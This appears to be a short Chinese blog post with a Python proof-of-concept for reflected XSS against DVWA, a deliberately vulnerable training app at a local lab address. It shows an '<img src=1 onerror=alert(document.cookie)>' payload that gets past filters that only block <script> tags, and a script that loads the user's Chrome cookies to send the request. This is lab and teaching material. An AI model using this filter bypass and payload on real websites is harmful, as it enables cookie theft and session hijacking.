POC——DVWA's XSS Reflected

XSS反射型中,三个等级内全都只定义了对<script>标签的过滤,所以通用一个<img>标签即可~

复制代码
 1 import requests
 2 import browser_cookie3
 3 from urllib import parse
 4 
 5 cookie = browser_cookie3.chrome()
 6 text1 = '<img src=1 onerror=alert(document.cookie)>'
 7 string1 = parse.quote(text1)
 8 url = 'http://192.168.117.130/DVWA-1.9/vulnerabilities/xss_r/?name='+string1
 9 response = requests.get(url=url,cookies=cookie)
10 
11 re = 'document.cookie'
12 flag=re in str(response.content)
13 
14 if flag:
15     print("It looks likely vulnerable")
16 else:
17     print("It is strong")
复制代码

此处没有必要一定要把请求url编码,在这里只是想加一下而已~

posted @   wavesky  阅读(35)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· SQL Server 2025 AI相关能力初探
· 单线程的Redis速度为什么快?
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
点击右上角即可分享
微信分享提示